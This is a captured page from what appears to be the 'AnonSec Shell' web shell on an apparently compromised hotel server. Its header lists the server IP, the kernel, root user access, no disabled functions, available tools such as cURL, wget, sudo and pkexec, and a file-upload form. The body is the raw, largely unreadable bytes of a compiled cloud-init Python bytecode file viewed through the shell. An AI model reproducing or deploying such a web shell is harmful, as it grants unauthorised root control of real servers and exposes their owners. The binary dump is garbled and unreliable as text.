AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root (0)
PHP Version : 8.1.2-1ubuntu2.22
Disabled Functions : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3/dist-packages/cloudinit/sources/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Current File : /lib/python3/dist-packages/cloudinit/sources/__pycache__/__init__.cpython-310.pyc
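
The file above is compiled CPython bytecode rather than text, which is why its body renders as the unreadable blob summarized below. The following is a minimal sketch, not part of the original page, of how the file's origin can be confirmed from the bytecode itself. It assumes an interpreter matching the cpython-310 tag (marshal data is only loadable by the bytecode version that wrote it) and uses only standard-library pieces: the 16-byte pyc header defined by PEP 552, marshal, and importlib.util.

# Minimal sketch: read the pyc header and unmarshal the top-level code object.
import marshal
from importlib.util import MAGIC_NUMBER

# Path taken from the "Current File" line above.
PYC = "/lib/python3/dist-packages/cloudinit/sources/__pycache__/__init__.cpython-310.pyc"

with open(PYC, "rb") as f:
    header = f.read(16)              # magic, bit field, then mtime+size or source hash (PEP 552)
    code = marshal.loads(f.read())   # the module's top-level code object

print("magic matches this interpreter:", header[:4] == MAGIC_NUMBER)
print("compiled from:", code.co_filename)                     # embedded source path
print("top-level names:", ", ".join(sorted(code.co_names)))   # imports, constants, classes, helpers

On a matching interpreter, dis.dis(code) from the standard library would additionally print the full disassembly of the module body.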
[ Binary file contents omitted: the remainder of the page was the raw CPython 3.10 bytecode of the file named above and does not render as text. The identifier strings and docstrings that survive legibly identify it as the compiled form of /usr/lib/python3/dist-packages/cloudinit/sources/__init__.py, the cloud-init module defining the abstract DataSource base class, the NetworkConfigSource and NicOrder enums, the URLParams, DataSourceHostname and HotplugRetrySettings named tuples, the DataSourceNotFoundException, InvalidMetaDataException, DatasourceUnpickleUserDataError and BrokenMetadata exceptions, and module-level helpers such as process_instance_metadata, redact_sensitive_keys, find_source, list_sources, canonical_cloud_id, convert_vendordata, pkl_store, pkl_load and parse_cmdline. ]

Anon7 - 2022
AnonSec Team